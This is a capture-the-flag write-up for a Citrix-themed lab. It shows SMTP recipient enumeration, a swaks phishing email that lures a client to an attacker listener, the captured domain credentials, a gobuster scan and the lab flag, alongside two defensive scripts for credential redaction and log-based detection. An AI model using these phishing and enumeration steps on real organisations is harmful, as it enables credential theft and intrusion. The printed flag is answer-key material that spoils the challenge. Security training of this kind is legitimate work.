Writeup

Uploaded by

hpu16328

Foothold:

The portal shows the contact address [email protected] and states that they are looking for new people in legal, sales, store and retail. I tested candidate addresses by hand with telnet and RCPT TO and found that sales and legal are valid addresses. As the official writeup suggests, SMTP user enumeration would have been the right choice, though the wordlist it picks is a strange one: /usr/share/wordlists/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt. It is not really needed. What does matter is that, to make the phishing work, the body of the email must contain the word "citrix" and the URL http://attacker_ip.

smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -m 50 -f jointheteam -t 10.13.38.12 -D humongousretail.com -
################################################################################
Sent the email as follows:

swaks --to [email protected] --from [email protected] --header "Subject: portal" --body "citrix http://10.10.15.23" --server 10.13.38.12

and received this answer on nc -lvnp 80 (different credentials come back if you send the email more times):

listening on [any] 80 ...
connect to [10.10.15.23] from (UNKNOWN) [10.13.38.12] 53929
POST /remote/auth/login.aspx?LoginType=Explicit&user=awardel&password=@M3m3ntoM0ri@&domain=HTB.LOCAL HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Host: 10.10.15.23
Content-Length: 75
Expect: 100-continue
Connection: Keep-Alive

LoginType=Explicit&user=awardel&password=%40M3m3ntoM0ri%40&domain=HTB.LOCAL
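The capture above is worth a second look from the defender's side: the client posted a domain password in cleartext to a host it took from an email body, and the login form put the password in the URL query string as well as in the body, so it also lands in every proxy and web-server log on the path. The script below is an added example, not code from the original writeup. It parses a raw HTTP/1.1 request of the same shape, reports every credential-bearing parameter that travelled in cleartext (query string and form body), and produces a redacted copy that is safe to attach to a ticket. The sample request is constructed with placeholder values, and the SENSITIVE parameter names are an assumption to extend for your own applications.

```python
"""Locate and redact credentials in a captured HTTP login request.

Added example, not code from the original writeup. It parses a raw
HTTP/1.1 request of the shape captured by nc above and reports every
credential-bearing parameter that travelled in cleartext, in the URL
query string as well as in the form body, then produces a redacted copy.
The sample request below is constructed with placeholder values.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names treated as secrets (assumption; extend for your applications).
SENSITIVE = {"password", "passwd", "pwd", "pass", "secret", "token"}

# Constructed sample: same field layout as the captured request, placeholder values.
SAMPLE_BODY = "LoginType=Explicit&user=jdoe&password=S3cret%40P&domain=EXAMPLE.LOCAL"
SAMPLE_REQUEST = (
    f"POST /remote/auth/login.aspx?{SAMPLE_BODY} HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 10.0.0.5\r\n"
    f"Content-Length: {len(SAMPLE_BODY)}\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    f"{SAMPLE_BODY}"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def _is_form(headers):
    return headers.get("content-type", "").startswith("application/x-www-form-urlencoded")


def find_exposed_credentials(raw):
    """Return [(location, name), ...] for sensitive parameters sent in cleartext."""
    request_line, headers, body = parse_request(raw)
    _method, target, _version = request_line.split(" ", 2)
    hits = []
    # Secrets in the query string end up in access logs, proxies and browser history.
    for name, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() in SENSITIVE:
            hits.append(("query", name))
    if _is_form(headers):
        for name, _ in parse_qsl(body, keep_blank_values=True):
            if name.lower() in SENSITIVE:
                hits.append(("body", name))
    return hits


def _redact_pairs(encoded):
    """Re-encode a query/form string with every sensitive value replaced."""
    pairs = parse_qsl(encoded, keep_blank_values=True)
    return urlencode([(n, "REDACTED" if n.lower() in SENSITIVE else v) for n, v in pairs])


def redact_request(raw):
    """Return a copy of the request with secrets in URL and body replaced by REDACTED."""
    head, sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    lines[0] = f"{method} {urlunsplit(parts._replace(query=_redact_pairs(parts.query)))} {version}"
    if _is_form(parse_request(raw)[1]):
        body = _redact_pairs(body)
        # The body length changed, so keep Content-Length consistent with it.
        for i, line in enumerate(lines):
            if line.lower().startswith("content-length:"):
                lines[i] = f"Content-Length: {len(body)}"
    return "\r\n".join(lines) + sep + body


if __name__ == "__main__":
    print("cleartext credentials at:", find_exposed_credentials(SAMPLE_REQUEST))
    print(redact_request(SAMPLE_REQUEST))
```

Run against a real capture, the "query" hits are the ones to raise with the application owner: a login form should carry credentials only in the body of a TLS-protected POST, and an endpoint that accepts them in the URL leaks them to every logging component in between.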

################################################################################
Ran a directory scan and found /remote, which has a login page asking for a username and password.

gobuster dir -u http://humongousretail.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://humongousretail.com
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 157] [--> http://humongousretail.com/images/]
/Images (Status: 301) [Size: 157] [--> http://humongousretail.com/Images/]
/css (Status: 301) [Size: 154] [--> http://humongousretail.com/css/]
/js (Status: 301) [Size: 153] [--> http://humongousretail.com/js/]
/remote (Status: 301) [Size: 157] [--> http://humongousretail.com/remote/]
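Both the RCPT TO probing in the Foothold section and the gobuster run just above leave the same footprint on the target: one source address producing a burst of rejections for names that do not exist, hundreds of "User unknown" replies on the mail server and a flood of 404s on the web server. The script below is an added example, not code from the original writeup, showing how a defender can surface that footprint from ordinary logs. It parses constructed Postfix-style rejection lines and Apache combined-format access lines, then flags any source that accumulates a threshold of distinct failing targets inside a time window. Every log line, address and threshold in it is constructed for the example.

```python
"""Flag SMTP recipient enumeration and web directory brute-forcing from logs.

Added example, not code from the original writeup. Parses constructed
Postfix-style rejection lines and Apache combined-format access lines and
flags sources that hit many distinct nonexistent targets in a short window.
All log lines, addresses and thresholds here are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Postfix smtpd rejection for RCPT TO of a nonexistent local user.
POSTFIX_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: NOQUEUE: reject: "
    r"RCPT from \S*\[(?P<src>[\d.]+)\]: 550 .*?<(?P<rcpt>[^>]+)>: Recipient address rejected"
)
# Apache combined log format (other servers' logs can be normalised to this shape).
ACCESS_RE = re.compile(
    r'^(?P<src>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: six unknown recipients probed from 10.0.0.9 within six seconds,
# plus a single mistyped recipient from a partner mail server.
SMTP_LOG = [
    f"Mar 03 10:00:{sec:02d} mx1 postfix/smtpd[4021]: NOQUEUE: reject: RCPT from unknown[10.0.0.9]: "
    f"550 5.1.1 <{name}@example.com>: Recipient address rejected: User unknown in local recipient "
    f"table; from=<sender@probe.example> to=<{name}@example.com> proto=ESMTP helo=<probe>"
    for sec, name in enumerate(["admin", "hr", "it", "finance", "support", "marketing"], start=1)
] + [
    "Mar 03 10:05:00 mx1 postfix/smtpd[4030]: NOQUEUE: reject: RCPT from mail.partner.example[10.0.0.20]: "
    "550 5.1.1 <bobb@example.com>: Recipient address rejected: User unknown in local recipient "
    "table; from=<alice@partner.example> to=<bobb@example.com> proto=ESMTP helo=<mail.partner.example>",
]
# Constructed sample: eight 404s from one client with a scanner User-Agent, plus a normal visitor.
WEB_LOG = [
    f'198.51.100.7 - - [03/Mar/2024:10:10:{sec:02d} +0000] "GET /{word} HTTP/1.1" 404 1245 "-" "gobuster/3.6"'
    for sec, word in enumerate(["admin", "backup", "test", "old", "dev", "api", "login", "portal"])
] + [
    '203.0.113.4 - - [03/Mar/2024:10:10:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [03/Mar/2024:10:10:09 +0000] "GET /favicon.ico HTTP/1.1" 404 1245 "-" "Mozilla/5.0"',
]


def smtp_events(lines, year=2024):
    """Yield (timestamp, source_ip, rejected_recipient); syslog lines carry no year."""
    for line in lines:
        m = POSTFIX_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["rcpt"].lower()


def web_events(lines, failing_status=("404",)):
    """Yield (timestamp, source_ip, path) for requests whose status counts as a miss."""
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m["status"] in failing_status:
            yield datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["src"], m["path"]


def find_bursts(events, threshold, window_seconds):
    """Return {source: peak} for sources reaching `threshold` distinct failing
    targets inside any `window_seconds` span; peak is the largest count seen."""
    by_src = defaultdict(list)
    for ts, src, target in events:
        by_src[src].append((ts, target))
    flagged = {}
    for src, items in by_src.items():
        items.sort()
        window, peak = [], 0
        for ts, target in items:
            window.append((ts, target))
            # Drop events older than the window before counting distinct targets.
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.pop(0)
            peak = max(peak, len({t for _, t in window}))
        if peak >= threshold:
            flagged[src] = peak
    return flagged


def detect_smtp_enumeration(lines=SMTP_LOG, threshold=5, window_seconds=60):
    return find_bursts(smtp_events(lines), threshold, window_seconds)


def detect_dir_bruteforce(lines=WEB_LOG, threshold=5, window_seconds=60):
    return find_bursts(web_events(lines), threshold, window_seconds)


if __name__ == "__main__":
    print("SMTP enumeration:", detect_smtp_enumeration())
    print("Directory brute force:", detect_dir_bruteforce())
```

Counting distinct targets rather than raw rejections is what separates enumeration from a misconfigured sender that retries the same bad address; tune the threshold and window against a baseline of your own mail and web traffic before alerting on it.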

Logged in with the credentials grabbed from the phishing email, and it works.
################################################################################
At /remote there is a Citrix login page that offers the Citrix Receiver client for download; it works on a Windows machine, on Linux I still could not get it working. After logging in with the credentials from the phishing, download the ICA configuration file and open it with Citrix Receiver; in the Desktop folder I found Flag.txt.
######################
XEN{wh0_n33d5_2f@?} # BREACH
######################

################################################################################
